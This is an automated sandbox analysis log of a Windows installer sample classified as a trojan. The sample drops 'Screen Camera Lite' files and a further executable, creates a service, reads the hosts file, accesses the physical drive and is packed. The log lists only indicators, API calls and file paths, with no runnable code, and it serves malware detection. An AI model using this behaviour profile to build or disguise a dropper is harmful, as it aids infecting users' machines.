        Source: AyiNxJ98mL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: AyiNxJ98mL.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-3VPQL.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-3VPQL.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-3VPQL.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-3VPQL.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-9QCH4.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-OLFPM.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-OOQC3.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-MLNUS.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-A0F2H.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-LI4GH.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-HM1KV.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-AKS9J.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-PCJSB.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-9FMQR.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-1EDIU.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: AyiNxJ98mL.exe, 00000000.00000003.1712874171.0000000002480000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AyiNxJ98mL.exe
        Source: AyiNxJ98mL.exe, 00000000.00000003.1713077693.00000000021D4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs AyiNxJ98mL.exe
        Source: AyiNxJ98mL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/70@1/2
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C808B8 FormatMessageA,GetLastError,2_2_02C808B8
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DF8
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: CreateServiceA,2_2_00402234
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0046E38C GetVersion,CoCreateInstance,1_2_0046E38C
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00402321 GetCommandLineW,CommandLineToArgvW,GetLocalTime,StartServiceCtrlDispatcherA,2_2_00402321
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00402321 GetCommandLineW,CommandLineToArgvW,GetLocalTime,StartServiceCtrlDispatcherA,2_2_00402321
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00402321 GetCommandLineW,CommandLineToArgvW,GetLocalTime,StartServiceCtrlDispatcherA,2_2_00402321
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_0040D099 lstrcmpiW,StartServiceCtrlDispatcherA,2_2_0040D099
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_0040D361 StartServiceCtrlDispatcherA,2_2_0040D361
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera LiteJump to behavior
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeFile created: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: AyiNxJ98mL.exeVirustotal: Detection: 23%
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeFile read: C:\Users\user\Desktop\AyiNxJ98mL.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\AyiNxJ98mL.exe "C:\Users\user\Desktop\AyiNxJ98mL.exe"
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp "C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp" /SL5="$20424,4742621,54272,C:\Users\user\Desktop\AyiNxJ98mL.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess created: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe "C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe" -i
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeProcess created: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp "C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp" /SL5="$20424,4742621,54272,C:\Users\user\Desktop\AyiNxJ98mL.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpProcess created: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe "C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Screen Camera Lite_is1Jump to behavior
        Source: AyiNxJ98mL.exeStatic file information: File size 5031933 > 1048576

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeUnpacked PE file: 2.2.screencameralite32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeUnpacked PE file: 2.2.screencameralite32_64.exe.400000.0.unpack
        Source: is-4575S.tmp.1.drStatic PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: is-A0F2H.tmp.1.drStatic PE information: section name: /4
        Source: is-QMR89.tmp.1.drStatic PE information: section name: /4
        Source: is-PCJSB.tmp.1.drStatic PE information: section name: /4
        Source: is-HM1KV.tmp.1.drStatic PE information: section name: /4
        Source: is-GGBLB.tmp.1.drStatic PE information: section name: /4
        Source: is-3OVHD.tmp.1.drStatic PE information: section name: /4
        Source: is-1VK0U.tmp.1.drStatic PE information: section name: /4
        Source: is-MLNUS.tmp.1.drStatic PE information: section name: /4
        Source: is-4575S.tmp.1.drStatic PE information: section name: /4
        Source: is-6G4V1.tmp.1.drStatic PE information: section name: /4
        Source: is-LIA5U.tmp.1.drStatic PE information: section name: /4
        Source: is-AKS9J.tmp.1.drStatic PE information: section name: /4
        Source: is-5J0K7.tmp.1.drStatic PE information: section name: /4
        Source: is-OOQC3.tmp.1.drStatic PE information: section name: /4
        Source: is-OLFPM.tmp.1.drStatic PE information: section name: /4
        Source: is-9FMQR.tmp.1.drStatic PE information: section name: /4
        Source: is-1EDIU.tmp.1.drStatic PE information: section name: /4
        Source: is-MC96J.tmp.1.drStatic PE information: section name: /4
        Source: is-9QCH4.tmp.1.drStatic PE information: section name: /4
        Source: is-6D3F1.tmp.1.drStatic PE information: section name: /4
        Source: is-1OTIR.tmp.1.drStatic PE information: section name: /4
        Source: is-2HDD5.tmp.1.drStatic PE information: section name: /4
        Source: is-6E6KU.tmp.1.drStatic PE information: section name: /4
        Source: is-CLVH5.tmp.1.drStatic PE information: section name: /4
        Source: is-DH98H.tmp.1.drStatic PE information: section name: /4
        Source: is-LI4GH.tmp.1.drStatic PE information: section name: /4
        Source: is-2B9OT.tmp.1.drStatic PE information: section name: /4
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00460088 push ecx; mov dword ptr [esp], ecx1_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0049467C push ecx; mov dword ptr [esp], ecx1_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004850AC push ecx; mov dword ptr [esp], ecx1_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00443450 push ecx; mov dword ptr [esp], ecx1_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00459634 push 00459678h; ret 1_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004517E4 push 00451817h; ret 1_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004519A8 push ecx; mov dword ptr [esp], eax1_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00483A08 push 00483AF7h; ret 1_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00477A24 push ecx; mov dword ptr [esp], edx1_2_00477A25

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02C7F7D6
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-4575S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-OLFPM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-LI4GH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-PCJSB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-AKS9J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-9FMQR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-MLNUS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-GGBLB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-5J0K7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-1VK0U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-6G4V1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q11OR.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-MC96J.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeFile created: C:\ProgramData\Escape Division LIB 10.6.45\Escape Division LIB 10.6.45.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-HM1KV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\is-OOQC3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpFile created: C:\Users\user\AppData\Local\Screen Camera Lite\libwinpthread-1.dll (copy)Jump to dropped file
